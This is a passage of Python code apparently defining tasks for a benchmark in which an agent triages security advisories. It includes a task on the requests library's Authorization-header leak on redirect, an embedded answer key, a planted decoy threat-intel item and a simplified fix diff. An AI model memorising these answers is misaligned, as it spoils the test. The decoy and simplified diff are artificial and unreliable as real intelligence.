                        # No "fixed" event — all versions affected, no patch yet
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}]},
                    ],
                }
            ],
            "cvss_vector": "Not yet available",
            # No NVD entry yet — too recent
            "nvd_description": "",
            # No EPSS data — CVE too new for scoring
            "epss_score": 0.0,
            "epss_percentile": 0.0,
        },
    ),
    "task_medium_requests": RuntimeCaseSeed(
        task_id="task_medium_requests",
        difficulty="medium",
        title="Requests Authorization Header Leak",
        objective="Resolve affected versions, weigh a conflicting exploitability signal, and inspect code diffs to determine if headers are properly stripped on redirects.",
        max_steps=14,
        osv_id="PYSEC-2018-32",
        next_action="publish_advisory",
        truth_override={
            "validity": "valid",
            "affected_package": "requests",
            "affected_versions": "<2.20.0",
            "severity": "medium",
            "exploitability": "medium",
            "next_action": "publish_advisory",
            "missing_information": [],
            "supporting_evidence_ids": [
                "osv_advisory",
                "affected_versions",
                "nvd_assessment",
                "github_commit_diff",
            ],
        },
        extra_evidence=[
            {
                "evidence_id": "github_commit_diff",
                "title": "GitHub Commit 0f78d3c",
                "kind": "reference",
                "summary": (
                    "```diff\n"
                    "@@ -101,3 +101,3 @@\n"
                    " def rebuild_auth(self, prepared_request, response):\n"
                    "+    url = urlparse(response.url)\n"
                    "+    if url.hostname != prepared_request.url.hostname:\n"
                    "+        prepared_request.headers.pop('Authorization', None)\n"
                    "```"
                )
            },
            {
                "evidence_id": "decoy_threat_intel_aiohttp",
                "title": "Threat Intel: aiohttp",
                "kind": "exploitability",
                "summary": "[CRITICAL] SSRF exploitation actively seen against the aiohttp python library. Rate severity Critical. (Note: Decoy for unrelated package)."
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2018-32",
            "summary": "Header linkage in redirects",
            "details": (
                "When sending requests with an Authorization header, if the server redirects to a different "
                "host it could inadvertently leak the credentials. Review the commit diff to see the vulnerability mechanism."
            ),
            "aliases": ["CVE-2018-18074"],
            "references": [],
            "affected": [
                {
                    "package": {"name": "requests", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "2.20.0"}]}
                    ]
                }
            ],
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "nvd_description": "The Requests package through 2.19.1 before 2.20.0 sends an HTTP Authorization header to an http URI upon receiving a redirect response.",
            "epss_score": 0.00512,
            "epss_percentile": 0.612,
        },
    ),
}


# Task ids in the order they are declared in SEEDS.
TASK_ORDER = list(SEEDS.keys())
# Difficulty labels, in the order used to build BENCHMARK_TASKS_BY_DIFFICULTY.
DIFFICULTY_ORDER = ["easy", "medium", "hard"]


@lru_cache(maxsize=16)
def get_case_definition(task_id: str) -> CaseDefinition:
    """Return the case for *task_id*, preferring live advisory data.

    The live snapshot is tried first.  If fetching it fails for any reason,
    the on-disk snapshot file is used, and if that is unavailable the seed's
    embedded fallback snapshot.  Results are memoized per task id, so a case
    built from fallback data is also reused on later calls.

    Raises:
        KeyError: if *task_id* is not a key of ``SEEDS``.
    """
    import logging

    seed = SEEDS[task_id]
    try:
        snapshot = _fetch_live_snapshot(seed)
    except Exception as exc:
        # Deliberately broad: any live-data failure (network, HTTP status,
        # unexpected payload shape) must degrade to offline data.  The cause
        # is logged so the fallback is not silent.
        logging.getLogger(__name__).warning(
            "Live snapshot for %s (%s) unavailable, using offline data: %s",
            task_id,
            seed.osv_id,
            exc,
        )
        snapshot = _load_snapshot_file(seed.osv_id) or seed.fallback_snapshot
    return _build_case(seed, snapshot)


# Cases built at import time from each seed's embedded fallback snapshot.
CASE_DEFINITIONS: Dict[str, CaseDefinition] = {
    task_id: _build_case(seed, seed.fallback_snapshot) for task_id, seed in SEEDS.items()
}


# Task ids grouped by difficulty; every label in DIFFICULTY_ORDER gets an entry
# (possibly an empty list), and ids keep their TASK_ORDER ordering.
BENCHMARK_TASKS_BY_DIFFICULTY: Dict[str, List[str]] = {
    difficulty: [
        task_id for task_id in TASK_ORDER if SEEDS[task_id].difficulty == difficulty
    ]
    for difficulty in DIFFICULTY_ORDER
}


def choose_balanced_task_id(seed: Optional[int], rng: random.Random) -> str:
    """Choose a benchmark task with balanced random difficulty sampling.

    A difficulty is drawn uniformly first, then a task uniformly within it, so
    difficulties with few tasks are not under-represented.  Difficulties that
    currently have no tasks are skipped; when every difficulty has at least
    one task the draw is identical to sampling from ``DIFFICULTY_ORDER``.

    Args:
        seed: If not ``None``, selection is deterministic from this seed.
        rng: Environment RNG used (and advanced) when *seed* is ``None``.

    Returns:
        The chosen task id.

    Raises:
        IndexError: if no difficulty has any task registered.
    """
    chooser = random.Random(seed) if seed is not None else rng
    # Drawing an empty bucket would make the second choice() fail.
    populated = [
        difficulty
        for difficulty in DIFFICULTY_ORDER
        if BENCHMARK_TASKS_BY_DIFFICULTY.get(difficulty)
    ]
    if not populated:
        raise IndexError("no benchmark tasks are registered for any difficulty")
    difficulty = chooser.choice(populated)
    return chooser.choice(BENCHMARK_TASKS_BY_DIFFICULTY[difficulty])